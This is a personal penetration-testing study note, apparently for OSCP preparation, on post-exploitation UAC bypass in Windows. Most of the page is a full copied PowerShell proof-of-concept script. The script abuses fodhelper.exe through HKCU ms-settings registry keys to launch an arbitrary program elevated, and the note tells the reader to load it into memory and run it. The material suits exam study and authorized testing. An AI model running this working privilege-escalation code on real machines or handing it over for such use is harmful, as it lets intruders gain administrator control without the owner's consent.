// notes/ Pivoting & Tunneling
🚀

Av Evasion Bypassing UAC

You might pop a shell on a domain user account that is an Administrator on the local computer but since it's just an interactive shell you can't run anything with the Administrato…

#post exploitation#adot8
source · oscp.adot8.com · post-exploitation/av-evasion_bypassing-uac

Bypassing UAC

You might pop a shell on a domain user account that is an Administrator on the local computer but since it's just an interactive shell you can't run anything with the Administrator tokens/privileges because of UAC

{% embed url="https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1" %}

powershell
$<#
$.SYNOPSIS
$ This script is a proof of concept to bypass the User Access Control (UAC) via fodhelper.exe
$
$ It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform an UAC bypass to start any application.
$
$ ATTENTION: Do not try this on your productive machine!
$
$
$.NOTES
$ Function : FodhelperBypass
$ File Name : FodhelperBypass.ps1
$ Author : Christian B. - winscripting.blog
$
$
$.LINK
$
$ https://github.com/winscripting/UAC-bypass
$
$.EXAMPLE
$
$ Load "cmd.exe /c powershell.exe" (it's default):
$ FodhelperBypass
$
$ Load specific application:
$ FodhelperBypass -program "cmd.exe"
$ FodhelperBypass -program "cmd.exe /c powershell.exe"
$
$
$#>
$
$function FodhelperBypass(){
$ Param (
$
$ [String]$program = "cmd /c start powershell.exe" #default
$ )
$
$ #Create registry structure
$ New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
$ New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
$ Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force
$
$ #Perform the bypass
$ Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
$
$ #Remove registry structure
$ Start-Sleep 3
$ Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
$
$}
$
$

Upload this script into memory and run it

powershell
$FodhelperBypass

{% hint style="info" %} This must be in a RDP sessions {% endhint %}